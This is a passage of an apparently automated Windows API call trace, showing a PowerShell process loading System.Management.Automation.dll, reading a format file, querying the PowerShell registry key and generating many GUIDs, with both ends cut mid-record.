out: pguid=0x23e538*(Data1=0x2a3dd81b, Data2=0xd22d, Data3=0x4dfc, Data4=([0]=0x89, [1]=0x8, [2]=0x5d, [3]=0x5, [4]=0xba, [5]=0xbc, [6]=0xef, [7]=0x9e))) returned 0x0 [0152.305] VirtualQuery (in: lpAddress=0x23cde4, lpBuffer=0x23dde4, dwLength=0x1c | out: lpBuffer=0x23dde4*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.305] GetLastError () returned 0x0 [0152.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.305] GetLastError () returned 0x0 [0152.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.305] GetLastError () returned 0x0 [0152.305] VirtualQuery (in: lpAddress=0x23cde4, lpBuffer=0x23dde4, dwLength=0x1c | out: lpBuffer=0x23dde4*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.305] GetLastError () returned 0x0 [0152.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.305] GetLastError () returned 0x0 [0152.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.306] GetLastError () returned 0x0 [0152.306] VirtualQuery (in: lpAddress=0x23cde4, lpBuffer=0x23dde4, dwLength=0x1c | out: lpBuffer=0x23dde4*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.306] GetLastError () returned 0x0 [0152.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.306] GetLastError () returned 0x0 [0152.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d788, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.306] GetLastError () returned 0x0 [0152.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.306] GetLastError () returned 0x0 [0152.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.306] GetLastError () returned 0x0 [0152.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.306] GetLastError () returned 0x0 [0152.306] VirtualQuery (in: lpAddress=0x23cde4, lpBuffer=0x23dde4, dwLength=0x1c | out: lpBuffer=0x23dde4*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.308] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x1a08eb60, Data2=0x823b, Data3=0x4b2f, Data4=([0]=0x9b, [1]=0x85, [2]=0x1, [3]=0xb5, [4]=0xc9, [5]=0x4a, [6]=0x22, [7]=0x1a))) returned 0x0 [0152.308] VirtualQuery (in: lpAddress=0x23d1b4, lpBuffer=0x23e1b4, dwLength=0x1c | out: lpBuffer=0x23e1b4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.311] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x9a4e565e, Data2=0x1446, Data3=0x49dc, Data4=([0]=0x92, [1]=0xe3, [2]=0x4f, [3]=0xa4, [4]=0xe6, [5]=0xd5, [6]=0x14, [7]=0x7f))) returned 0x0 [0152.313] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xd6b9470b, Data2=0x7df8, Data3=0x4d29, Data4=([0]=0x8a, [1]=0x5e, [2]=0xd8, [3]=0xe6, [4]=0xc8, [5]=0x65, [6]=0x3f, [7]=0xa4))) returned 0x0 [0152.313] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xfee271fc, Data2=0xa78c, Data3=0x4cb8, Data4=([0]=0xa2, [1]=0x58, [2]=0xdb, [3]=0xb4, [4]=0x94, [5]=0x23, [6]=0x74, [7]=0x10))) returned 0x0 [0152.313] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xbeacbc49, Data2=0xf406, Data3=0x4659, Data4=([0]=0xbc, [1]=0x76, [2]=0x37, [3]=0xd4, [4]=0xe6, [5]=0xa6, [6]=0xb8, [7]=0x19))) returned 0x0 [0152.314] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x39cec443, Data2=0x140c, Data3=0x40d5, Data4=([0]=0xb5, [1]=0x51, [2]=0xdb, [3]=0x62, [4]=0x34, [5]=0x6c, [6]=0x44, [7]=0xad))) returned 0x0 [0152.315] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x5cd67a34, Data2=0x48ed, Data3=0x4aa7, Data4=([0]=0x93, [1]=0x50, [2]=0x5, [3]=0xea, [4]=0x41, [5]=0x5e, [6]=0x26, [7]=0xa8))) returned 0x0 [0152.315] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x199e98ca, Data2=0xd302, Data3=0x4b18, Data4=([0]=0xbf, [1]=0xb4, [2]=0x6b, [3]=0x20, [4]=0x77, [5]=0xad, [6]=0x4a, [7]=0x4d))) returned 0x0 [0152.315] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xe9b37533, Data2=0x5f4c, Data3=0x4361, Data4=([0]=0x97, [1]=0x86, [2]=0xd1, [3]=0x62, [4]=0xf5, [5]=0xe7, [6]=0xec, [7]=0x18))) returned 0x0 [0152.315] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x2a99f29d, Data2=0xe5c7, Data3=0x4bbd, Data4=([0]=0xa2, [1]=0x38, [2]=0x4d, [3]=0x7e, [4]=0x33, [5]=0xe9, [6]=0x87, [7]=0x67))) returned 0x0 [0152.315] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0152.316] GetLastError () returned 0x0 [0152.316] GetFileType (hFile=0x34c) returned 0x1 [0152.316] SetErrorMode (uMode=0x1) returned 0x1 [0152.316] GetFileType (hFile=0x34c) returned 0x1 [0152.316] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.316] GetLastError () returned 0x0 [0152.316] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.316] GetLastError () returned 0x0 [0152.317] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.317] GetLastError () returned 0x0 [0152.317] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.317] GetLastError () returned 0x0 [0152.317] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.317] GetLastError () returned 0x0 [0152.317] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.317] GetLastError () returned 0x0 [0152.317] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.317] GetLastError () returned 0x0 [0152.318] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.318] GetLastError () returned 0x0 [0152.318] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.318] GetLastError () returned 0x0 [0152.319] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.319] GetLastError () returned 0x0 [0152.319] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.319] GetLastError () returned 0x0 [0152.319] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.319] GetLastError () returned 0x0 [0152.319] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.319] GetLastError () returned 0x0 [0152.319] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.319] GetLastError () returned 0x0 [0152.319] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.319] GetLastError () returned 0x0 [0152.319] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.319] GetLastError () returned 0x0 [0152.320] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.320] GetLastError () returned 0x0 [0152.321] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.321] GetLastError () returned 0x0 [0152.321] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.321] GetLastError () returned 0x0 [0152.321] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.321] GetLastError () returned 0x0 [0152.322] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.322] GetLastError () returned 0x0 [0152.322] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0xe67, lpOverlapped=0x0) returned 1 [0152.322] GetLastError () returned 0x0 [0152.322] ReadFile (in: hFile=0x34c, lpBuffer=0x305770f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x305770f*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0152.322] GetLastError () returned 0x0 [0152.322] ReadFile (in: hFile=0x34c, lpBuffer=0x3058108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x3058108*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0152.322] GetLastError () returned 0x0 [0152.322] CloseHandle (hObject=0x34c) returned 1 [0152.322] GetLastError () returned 0x0 [0152.323] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e4c8 | out: phkResult=0x23e4c8*=0x34c) returned 0x0 [0152.323] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x0, lpcbData=0x23e50c*=0x0 | out: lpType=0x23e510*=0x1, lpData=0x0, lpcbData=0x23e50c*=0x56) returned 0x0 [0152.323] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x357e88, lpcbData=0x23e50c*=0x56 | out: lpType=0x23e510*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e50c*=0x56) returned 0x0 [0152.323] RegCloseKey (hKey=0x34c) returned 0x0 [0152.325] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xfa943376, Data2=0xc8a6, Data3=0x4a4b, Data4=([0]=0x85, [1]=0xee, [2]=0x74, [3]=0xbf, [4]=0xa8, [5]=0x86, [6]=0x5a, [7]=0x6f))) returned 0x0 [0152.325] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xc10c53aa, Data2=0x571b, Data3=0x406a, Data4=([0]=0xaf, [1]=0x4b, [2]=0x97, [3]=0xb4, [4]=0x2f, [5]=0x69, [6]=0xd2, [7]=0x4b))) returned 0x0 [0152.325] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x52280d8d, Data2=0xfec9, Data3=0x42f7, Data4=([0]=0xbe, [1]=0x7e, [2]=0x70, [3]=0x9d, [4]=0x7f, [5]=0xb2, [6]=0xa7, [7]=0x3))) returned 0x0 [0152.325] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x7a0c864f, Data2=0x4f65, Data3=0x441f, Data4=([0]=0xb8, [1]=0x64, [2]=0xea, [3]=0x77, [4]=0xd9, [5]=0x76, [6]=0xc6, [7]=0x35))) returned 0x0 [0152.325] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x9d59b8f9, Data2=0x5f16, Data3=0x4870, Data4=([0]=0x86, [1]=0xe7, [2]=0x69, [3]=0x30, [4]=0xad, [5]=0x8a, [6]=0xac, [7]=0x4f))) returned 0x0 [0152.326] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x7bc15d60, Data2=0x283, Data3=0x4401, Data4=([0]=0xb3, [1]=0xe4, [2]=0xc8, [3]=0xea, [4]=0x5b, [5]=0x41, [6]=0xee, [7]=0x7b))) returned 0x0 [0152.326] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x6416d153, Data2=0xf566, Data3=0x4682, Data4=([0]=0xae, [1]=0x5a, [2]=0x64, [3]=0x62, [4]=0xbc, [5]=0x5e, [6]=0x96, [7]=0x56))) returned 0x0 [0152.326] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x8cb94db5, Data2=0xfd0f, Data3=0x4871, Data4=([0]=0xa1, [1]=0xd3, [2]=0x22, [3]=0x27, [4]=0xa2, [5]=0x5f, [6]=0xd4, [7]=0x69))) returned 0x0 [0152.326] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xfbe40706, Data2=0x38f, Data3=0x48a5, Data4=([0]=0xb9, [1]=0x61, [2]=0x8, [3]=0x74, [4]=0x31, [5]=0xc0, [6]=0x20, [7]=0xc3))) returned 0x0 [0152.326] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xf8e4d589, Data2=0xdd75, Data3=0x46f9, Data4=([0]=0xaf, [1]=0x58, [2]=0x3f, [3]=0xd7, [4]=0xc0, [5]=0xeb, [6]=0x96, [7]=0x4e))) returned 0x0 [0152.326] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xa917c007, Data2=0x6fae, Data3=0x4cf8, Data4=([0]=0xad, [1]=0x39, [2]=0xad, [3]=0xc2, [4]=0x18, [5]=0x3d, [6]=0xa2, [7]=0xd2))) returned 0x0 [0152.326] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x286e9a51, Data2=0x52ec, Data3=0x4711, Data4=([0]=0x97, [1]=0xed, [2]=0x5b, [3]=0xfb, [4]=0x9b, [5]=0xe6, [6]=0xb3, [7]=0x2))) returned 0x0 [0152.327] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xcb280c48, Data2=0xe190, Data3=0x4abb, Data4=([0]=0x99, [1]=0xaa, [2]=0xda, [3]=0xa0, [4]=0x17, [5]=0x55, [6]=0x16, [7]=0x73))) returned 0x0 [0152.327] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x41a851ed, Data2=0xa245, Data3=0x40dc, Data4=([0]=0xa8, [1]=0xf1, [2]=0xc0, [3]=0xb8, [4]=0x78, [5]=0xb4, [6]=0xfa, [7]=0x25))) returned 0x0 [0152.327] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xba40f27f, Data2=0xa30e, Data3=0x4872, Data4=([0]=0xbb, [1]=0x3e, [2]=0x34, [3]=0x58, [4]=0x4e, [5]=0x4, [6]=0x39, [7]=0xcf))) returned 0x0 [0152.327] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x7b674157, Data2=0x93d3, Data3=0x4164, Data4=([0]=0xb8, [1]=0x6e, [2]=0x57, [3]=0xf5, [4]=0xea, [5]=0x38, [6]=0x1b, [7]=0x8e))) returned 0x0 [0152.327] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xea116b11, Data2=0x8ba1, Data3=0x4e94, Data4=([0]=0x99, [1]=0xee, [2]=0x2f, [3]=0x1d, [4]=0xee, [5]=0x24, [6]=0x88, [7]=0x6e))) returned 0x0 [0152.327] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x1c3c401f, Data2=0x246a, Data3=0x4391, Data4=([0]=0x95, [1]=0x8c, [2]=0x94, [3]=0xb8, [4]=0x53, [5]=0x11, [6]=0x7b, [7]=0x84))) returned 0x0 [0152.327] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xdffcc6ff, Data2=0x7e35, Data3=0x4b0c, Data4=([0]=0x97, [1]=0xe6, [2]=0x90, [3]=0x43, [4]=0xfc, [5]=0x2c, [6]=0x35, [7]=0xc9))) returned 0x0 [0152.328] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xfcd53b47, Data2=0x3c5a, Data3=0x4682, Data4=([0]=0x90, [1]=0x9c, [2]=0x58, [3]=0x98, [4]=0x1b, [5]=0xf9, [6]=0xfa, [7]=0x17))) returned 0x0 [0152.328] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x37ef3027, Data2=0xebfc, Data3=0x46a8, Data4=([0]=0x9b, [1]=0xf4, [2]=0x71, [3]=0x4f, [4]=0x97, [5]=0x92, [6]=0xa, [7]=0x54))) returned 0x0 [0152.328] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x4084c35b, Data2=0x45aa, Data3=0x41af, Data4=([0]=0x89, [1]=0xb7, [2]=0x83, [3]=0x4f, [4]=0xdb, [5]=0xca, [6]=0xc3, [7]=0xb4))) returned 0x0 [0152.329] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x4ee2b455, Data2=0xdf71, Data3=0x4fb4, Data4=([0]=0xae, [1]=0x59, [2]=0x8e, [3]=0xcf, [4]=0x58, [5]=0xe9, [6]=0xe7, [7]=0x74))) returned 0x0 [0152.330] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x37a6b6a, Data2=0x7751, Data3=0x46f1, Data4=([0]=0x96, [1]=0x9f, [2]=0xc4, [3]=0xa3, [4]=0xc, [5]=0x17, [6]=0x7a, [7]=0xe0))) returned 0x0 [0152.330] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x76fa39a3, Data2=0xefb0, Data3=0x46ec, Data4=([0]=0x91, [1]=0x4f, [2]=0xc4, [3]=0x89, [4]=0x2e, [5]=0x23, [6]=0x21, [7]=0x22))) returned 0x0 [0152.330] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x81673112, Data2=0xb3f9, Data3=0x45e2, Data4=([0]=0x8b, [1]=0xf7, [2]=0xef, [3]=0x62, [4]=0xf2, [5]=0xb4, [6]=0xc8, [7]=0x1f))) returned 0x0 [0152.330] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x216f7550, Data2=0x7b0d, Data3=0x4dd7, Data4=([0]=0xae, [1]=0xf8, [2]=0x7d, [3]=0x7e, [4]=0xf1, [5]=0x70, [6]=0xe1, [7]=0xf0))) returned 0x0 [0152.330] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x1cee56d1, Data2=0x27a7, Data3=0x4d45, Data4=([0]=0x89, [1]=0xd7, [2]=0xbb, [3]=0x4f, [4]=0xd7, [5]=0xf9, [6]=0xff, [7]=0xde))) returned 0x0 [0152.331] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xe049f448, Data2=0x3223, Data3=0x47c1, Data4=([0]=0xb6, [1]=0xea, [2]=0xda, [3]=0x5c, [4]=0x3b, [5]=0xb1, [6]=0x97, [7]=0x0))) returned 0x0 [0152.331] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xf393c8b4, Data2=0x7f75, Data3=0x42cf, Data4=([0]=0x80, [1]=0xda, [2]=0xe0, [3]=0xd0, [4]=0xc1, [5]=0xca, [6]=0xa, [7]=0xf8))) returned 0x0 [0152.331] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xc1efb168, Data2=0xb043, Data3=0x4fb3, Data4=([0]=0xa7, [1]=0x10, [2]=0xbe, [3]=0x89, [4]=0xa4, [5]=0xbe, [6]=0x13, [7]=0x6e))) returned 0x0 [0152.331] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xdf3eb3da, Data2=0xb849, Data3=0x4971, Data4=([0]=0xa4, [1]=0x21, [2]=0xbc, [3]=0xdc, [4]=0xde, [5]=0xc8, [6]=0x3b, [7]=0x1b))) returned 0x0 [0152.331] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x4f3f945b, Data2=0x7ee9, Data3=0x4c2f, 